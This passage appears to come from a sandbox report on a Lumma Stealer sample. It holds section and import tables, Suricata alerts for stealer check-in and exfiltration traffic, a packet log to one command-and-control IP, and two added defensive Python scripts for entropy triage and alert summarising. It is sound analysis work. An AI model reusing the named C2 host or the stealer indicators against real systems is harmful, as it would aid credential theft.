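IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PACKED_THRESHOLD = 7.0  # bits per byte; assumed cut-off, plain code and data rarely exceed it


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the metric in the Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """DOS header -> PE signature -> COFF header -> IMAGE_SECTION_HEADER array.
    Returns (name, virtual_address, virtual_size, raw_offset, raw_size, characteristics)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    first = coff + 20 + opt_size  # section headers follow the optional header
    out = []
    for i in range(nsections):
        (name, vsize, vaddr, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, first + i * 40)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"),
                    vaddr, vsize, raw_ptr, raw_size, chars))
    return out


def triage_sections(pe: bytes):
    """One row per section with the entropy recomputed from the raw bytes and the two flags."""
    rows = []
    for name, vaddr, vsize, raw_ptr, raw_size, chars in parse_sections(pe):
        ent = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
        executable = bool(chars & IMAGE_SCN_MEM_EXECUTE)
        writable = bool(chars & IMAGE_SCN_MEM_WRITE)
        rows.append({
            "name": name, "virtual_address": vaddr, "virtual_size": vsize,
            "raw_size": raw_size, "entropy": round(ent, 4),
            "executable": executable, "writable": writable,
            "high_entropy": ent > PACKED_THRESHOLD,
            "writable_and_executable": executable and writable,
        })
    return rows


def build_sample_pe() -> bytes:
    """Constructed PE64 image (not the sample from this report): a low-entropy .text and a
    .rdata filled with a SHA-256 keystream, standing in for an encrypted blob."""
    text = bytes(range(16)) * 256  # 4096 bytes, 16 symbols: exactly 4.0 bits/byte
    rdata = b"".join(hashlib.sha256(b"demo" + i.to_bytes(4, "little")).digest()
                     for i in range(128))  # 4096 pseudo-random bytes
    headers = bytearray(0x200)
    headers[0:2] = b"MZ"
    struct.pack_into("<I", headers, 0x3C, 0x40)  # e_lfanew
    headers[0x40:0x44] = b"PE\0\0"
    # COFF header: AMD64, 2 sections, SizeOfOptionalHeader 0, EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE
    struct.pack_into("<HHIIIHH", headers, 0x44, 0x8664, 2, 0, 0, 0, 0, 0x0022)
    sections = [  # (name, VirtualSize, VirtualAddress, PointerToRawData, SizeOfRawData, flags)
        (b".text", 0x1000, 0x1000, 0x200, len(text), 0x60000020),    # CODE|EXECUTE|READ
        (b".rdata", 0x1000, 0x2000, 0x1200, len(rdata), 0x40000040),  # INITIALIZED_DATA|READ
    ]
    for i, (name, vsize, vaddr, raw_ptr, raw_size, chars) in enumerate(sections):
        struct.pack_into("<8sIIIIIIHHI", headers, 0x58 + i * 40,
                         name, vsize, vaddr, raw_size, raw_ptr, 0, 0, 0, 0, chars)
    return bytes(headers) + text + rdata


if __name__ == "__main__":
    # On a real file: triage_sections(open(path, "rb").read())
    for r in triage_sections(build_sample_pe()):
        print(f"{r['name']:8} entropy={r['entropy']:.3f} high_entropy={r['high_entropy']} "
              f"W+X={r['writable_and_executable']}")
```

The walk deliberately ignores the optional header except for its size, which is all that is needed to find the section table; on a real image the raw slice is bounded by the file length, so a truncated section simply yields the entropy of what is present.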
Name         RVA       Size   Type                                          Language  Country        ZLIB Complexity
RT_MANIFEST  0xc12058  0x15b  ASCII text, with CRLF line terminators        English   United States  0.5446685878962536
DLL: KERNEL32.dll
Imports: AcquireSRWLockExclusive, CloseHandle, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualProtect, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
Note: KERNEL32.dll is the only imported module and the list is the MSVC C runtime's own (heap, locale, TLS, SEH, console I/O). None of the behaviour recorded under Signatures (TLS to the C2, WMI queries, browser and wallet access, process injection) is covered by it, so those APIs are either resolved at run time through the imported LoadLibraryExW/GetProcAddress pair or belong to the PE that the sample injects into another process. The import hash above therefore identifies the compiler runtime, not the stealer, and is a weak pivot on its own.
Language of compilation system: English
Country where language is spoken: United States
Timestamp                         SID      Signature                                                   Severity  Source IP     Source Port  Dest IP         Dest Port  Protocol
2024-12-30T15:55:16.951297+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  49756        172.67.148.118  443        TCP
2024-12-30T15:55:29.028116+0100   2049836  ET MALWARE Lumma Stealer Related Activity                   1         192.168.2.11  49756        172.67.148.118  443        TCP
2024-12-30T15:55:29.028116+0100   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                   1         192.168.2.11  49756        172.67.148.118  443        TCP
2024-12-30T15:55:29.522357+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  49837        172.67.148.118  443        TCP
2024-12-30T15:55:30.029059+0100   2049812  ET MALWARE Lumma Stealer Related Activity M2                1         192.168.2.11  49837        172.67.148.118  443        TCP
2024-12-30T15:55:30.029059+0100   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                   1         192.168.2.11  49837        172.67.148.118  443        TCP
2024-12-30T15:55:31.034523+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  49845        172.67.148.118  443        TCP
2024-12-30T15:55:32.407597+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  49858        172.67.148.118  443        TCP
2024-12-30T15:55:32.941576+0100   2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration       1         192.168.2.11  49858        172.67.148.118  443        TCP
2024-12-30T15:55:33.807369+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  49869        172.67.148.118  443        TCP
2024-12-30T15:55:36.886737+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  64243        172.67.148.118  443        TCP
2024-12-30T15:55:38.672375+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  64254        172.67.148.118  443        TCP
2024-12-30T15:55:41.123431+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.11  64270        172.67.148.118  443        TCP
2024-12-30T15:55:41.627242+0100   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                   1         192.168.2.11  64270        172.67.148.118  443        TCP
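Every alert above targets the same host and port, and each distinct client source port is a separate TLS session: eight sessions to 172.67.148.118:443 inside 25 seconds, with the JA3 signature firing on every handshake and the severity-1 Lumma signatures on the check-in and exfiltration sessions. The following Python script is an added example, not part of the Joe Sandbox report: it reduces alert rows of this shape to a per-destination summary (sessions, time window, signature set, highest severity, which signatures fired on which session) and applies a simple check-in-loop heuristic. The rows are transcribed from the table above into a CSV of our own framing; the thresholds in looks_like_checkin_loop are assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime

# Alert rows transcribed from the Suricata table of this report. Columns (our framing):
# timestamp, SID, signature, severity, src IP, src port, dst IP, dst port, protocol.
ALERTS_CSV = """\
2024-12-30T15:55:16.951297+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,49756,172.67.148.118,443,TCP
2024-12-30T15:55:29.028116+0100,2049836,ET MALWARE Lumma Stealer Related Activity,1,192.168.2.11,49756,172.67.148.118,443,TCP
2024-12-30T15:55:29.028116+0100,2054653,ET MALWARE Lumma Stealer CnC Host Checkin,1,192.168.2.11,49756,172.67.148.118,443,TCP
2024-12-30T15:55:29.522357+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,49837,172.67.148.118,443,TCP
2024-12-30T15:55:30.029059+0100,2049812,ET MALWARE Lumma Stealer Related Activity M2,1,192.168.2.11,49837,172.67.148.118,443,TCP
2024-12-30T15:55:30.029059+0100,2054653,ET MALWARE Lumma Stealer CnC Host Checkin,1,192.168.2.11,49837,172.67.148.118,443,TCP
2024-12-30T15:55:31.034523+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,49845,172.67.148.118,443,TCP
2024-12-30T15:55:32.407597+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,49858,172.67.148.118,443,TCP
2024-12-30T15:55:32.941576+0100,2048094,ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration,1,192.168.2.11,49858,172.67.148.118,443,TCP
2024-12-30T15:55:33.807369+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,49869,172.67.148.118,443,TCP
2024-12-30T15:55:36.886737+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,64243,172.67.148.118,443,TCP
2024-12-30T15:55:38.672375+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,64254,172.67.148.118,443,TCP
2024-12-30T15:55:41.123431+0100,2028371,ET JA3 Hash - Possible Malware - Fake Firefox Font Update,3,192.168.2.11,64270,172.67.148.118,443,TCP
2024-12-30T15:55:41.627242+0100,2054653,ET MALWARE Lumma Stealer CnC Host Checkin,1,192.168.2.11,64270,172.67.148.118,443,TCP
"""


def parse_alerts(text):
    """Parse CSV alert rows into dicts with typed fields (timestamps keep their UTC offset)."""
    alerts = []
    for rec in csv.reader(io.StringIO(text)):
        if not rec:
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = rec
        alerts.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "signature": sig, "severity": int(sev),
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto,
        })
    return alerts


def summarize_destinations(alerts):
    """Group alerts by (dst IP, dst port, proto). Each distinct client source port is one
    TCP connection, so the number of ports is the number of sessions to that host."""
    groups = defaultdict(list)
    for a in alerts:
        groups[(a["dst"], a["dport"], a["proto"])].append(a)
    summary = {}
    for key, rows in groups.items():
        per_port = defaultdict(set)  # which SIDs fired on which session
        for a in rows:
            per_port[a["sport"]].add(a["sid"])
        first = min(a["ts"] for a in rows)
        last = max(a["ts"] for a in rows)
        summary[key] = {
            "alerts": len(rows),
            "connections": len(per_port),
            "per_port": dict(per_port),
            "sids": {a["sid"] for a in rows},
            "highest_severity": min(a["severity"] for a in rows),  # Suricata: 1 is most severe
            "window_seconds": (last - first).total_seconds(),
        }
    return summary


def looks_like_checkin_loop(entry, min_sessions=3, max_window=60.0):
    """Assumed heuristic: several short sessions to one host within a minute, at least one
    carrying a severity-1 malware signature, is the shape of a stealer check-in/exfil loop."""
    return (entry["connections"] >= min_sessions
            and entry["window_seconds"] <= max_window
            and entry["highest_severity"] == 1)


if __name__ == "__main__":
    for key, entry in summarize_destinations(parse_alerts(ALERTS_CSV)).items():
        print(key, entry["connections"], "sessions,", entry["alerts"], "alerts,",
              "SIDs", sorted(entry["sids"]), "window %.1fs" % entry["window_seconds"],
              "checkin_loop=%s" % looks_like_checkin_loop(entry))
```

Keying on the source port is what separates the one exfiltration session (49858, where SID 2048094 fires next to the JA3 hit) from the plain check-ins, and it is the same join a SIEM would do against the TCP packet table that follows.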
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 30, 2024 15:55:16.475481033 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:16.475541115 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:16.475661993 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:16.483268023 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:16.483306885 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:16.951209068 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:16.951297045 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:17.062865973 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:17.062897921 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:17.063297987 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:17.109038115 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:17.407938957 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:17.408190966 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:17.408221006 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.027844906 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.027937889 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.027995110 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.030339956 CET  49756        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.030360937 CET  443          49756      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.044615984 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.044644117 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.044760942 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.046056986 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.046066046 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.522205114 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.522356987 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.563458920 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.563477993 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.563821077 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:29.565824032 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.565933943 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:29.565960884 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.028939009 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029055119 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029105902 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029114008 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.029133081 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029164076 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029181004 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.029194117 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029203892 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029243946 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.029279947 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029324055 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.029334068 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029381037 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.029432058 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.029439926 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.077814102 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.119021893 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.119086981 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.119111061 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.119215012 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.119322062 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.119322062 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.119558096 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.119576931 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.119590044 CET  49837        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.119596004 CET  443          49837      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.522305012 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.522342920 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:30.522418976 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.523144960 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:30.523159981 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.034384966 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.034523010 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.036494017 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.036503077 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.036794901 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.044831038 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.045110941 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.045145988 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.785157919 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.785279036 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.785481930 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.785528898 CET  49845        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.785535097 CET  443          49845      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.945028067 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.945041895 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:31.945398092 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.945890903 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:31.945903063 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.407510996 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.407597065 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:32.410361052 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:32.410375118 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.411102057 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.422070980 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:32.422363997 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:32.422396898 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.422457933 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:32.467334986 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.941571951 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.941694975 CET  443          49858      172.67.148.118  192.168.2.11
Dec 30, 2024 15:55:32.941782951 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:33.023469925 CET  49858        443        192.168.2.11    172.67.148.118
Dec 30, 2024 15:55:33.023490906 CET  443          49858      172.67.148.118  192.168.2.11
                                                                                Dec 30, 2024 15:55:33.342485905 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.342525005 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.342621088 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.343200922 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.343214989 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.807291031 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.807368994 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.808921099 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.808928013 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.809170961 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.810852051 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.811062098 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.811091900 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.811176062 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.811183929 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:34.308660030 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:34.308765888 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:34.308830023 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:34.309237957 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:34.309252024 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.420447111 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.420490026 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.420563936 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.421112061 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.421125889 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.886641026 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.886737108 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.889751911 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.889758110 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.890014887 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.892384052 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.892476082 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.892481089 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:37.777085066 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:37.777184963 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:37.777364969 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:37.777492046 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:37.777509928 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.210916042 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.210944891 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.211343050 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.211477041 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.211484909 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.672283888 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.672374964 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.715472937 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.715500116 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.715820074 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.717150927 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718220949 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718251944 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.718396902 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718425989 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.718679905 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718719006 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.718971968 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719002008 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719141960 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719168901 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719356060 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719409943 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719446898 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719451904 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719609022 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719636917 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719660997 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719845057 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719866991 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.727360010 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.728905916 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.728977919 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.729021072 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.729078054 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.729594946 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.637547016 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.637630939 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.637881994 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.638164997 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.638181925 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.651074886 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.651113033 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.651381969 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.651762009 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.651772976 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.123191118 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.123430967 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.124603033 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.124612093 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.124880075 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.126406908 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.126426935 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.126493931 CET44364270172.67.148.118192.168.2.11
